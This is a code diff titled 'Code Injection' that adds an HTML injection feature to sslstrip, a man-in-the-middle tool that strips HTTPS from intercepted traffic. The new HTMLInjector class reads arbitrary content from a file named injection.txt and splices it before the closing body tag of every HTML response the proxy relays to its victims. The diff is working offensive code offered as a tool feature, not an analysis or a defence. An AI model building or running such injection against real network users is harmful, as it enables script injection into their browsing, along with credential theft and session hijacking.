Code Injection

sslstrip.py

@@ -30,6 +30,7 @@
 from sslstrip.StrippingProxy import StrippingProxy
 from sslstrip.URLMonitor import URLMonitor
 from sslstrip.CookieCleaner import CookieCleaner
+from sslstrip.HTMLInjector import HTMLInjector
 
 import sys, getopt, logging, traceback, string, os
 
@@ -92,6 +93,13 @@ def main(argv):
     logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s',
                         filename=logFile, filemode='w')
 
+    try:
+        # make the file a command line option?
+        with open('injection.txt', 'r') as f:
+            HTMLInjector.getInstance().setInjectionCode(f.read())
+    except IOError as e:
+        logging.warning("Couldn't read injection.txt")
+
     URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
     CookieCleaner.getInstance().setEnabled(killSessions)
 

sslstrip/HTMLInjector.py

@@ -0,0 +1,26 @@
+import logging
+
+class HTMLInjector:
+    """ This class allows you to inject data into the response returned
+    from the web server.
+    """
+
+    _instance = None
+
+    @staticmethod
+    def getInstance():
+        if HTMLInjector._instance is None:
+            HTMLInjector._instance = HTMLInjector()
+
+        return HTMLInjector._instance
+
+    def __init__(self):
+        self.injection_code = []
+
+    def setInjectionCode(self, code):
+        self.injection_code.append(code)
+
+    def inject(self, data):
+        injection_code = ' '.join(self.injection_code)
+
+        return data.replace('</body>', '%s</body>' % injection_code)

sslstrip/ServerConnection.py

@@ -20,6 +20,7 @@
 
 from twisted.web.http import HTTPClient
 from URLMonitor import URLMonitor
+from HTMLInjector import HTMLInjector
 
 class ServerConnection(HTTPClient):
 
@@ -39,6 +40,7 @@ def __init__(self, command, uri, postData, headers, client):
         self.headers          = headers
         self.client           = client
         self.urlMonitor       = URLMonitor.getInstance()
+        self.HTMLInjector     = HTMLInjector.getInstance()
         self.isImageRequest   = False
         self.isCompressed     = False
         self.contentLength    = None
@@ -125,7 +127,12 @@ def handleResponse(self, data):
 
         logging.log(self.getLogLevel(), "Read from server:\n" + data)
 
-        data = self.replaceSecureLinks(data)
+        data         = self.replaceSecureLinks(data)
+        content_type = self.client.responseHeaders.getRawHeaders('content-type')
+
+        # only want to inject into text/html pages
+        if content_type and content_type[0] == 'text/html':
+            data = self.HTMLInjector.inject(data)
 
         if (self.contentLength != None):
             self.client.setHeader('Content-Length', len(data))